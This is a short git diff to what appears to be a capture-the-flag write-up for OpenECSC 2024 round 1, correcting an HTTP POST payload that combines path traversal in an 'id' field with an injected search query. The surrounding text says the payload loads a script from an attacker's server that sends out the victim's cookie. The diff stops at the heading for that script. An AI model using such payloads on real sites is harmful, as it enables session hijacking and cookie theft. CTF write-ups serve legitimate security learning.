diff --git a/2024_OpenECSC/round1.md b/2024_OpenECSC/round1.md index 4fb9cd3..4fd55af 100644 --- a/2024_OpenECSC/round1.md +++ b/2024_OpenECSC/round1.md @@ -95,7 +95,7 @@ Then the payload loads a script from the attackers server, which sends the cooki #### Payload ```http POST /report?q=/admin HTTP/1.1 -id=3../../../search?q=">&message=as/admin +id=3../../../search?q=/admin">&message=as/admin ``` #### Payload Script on Attackers Server ```javascript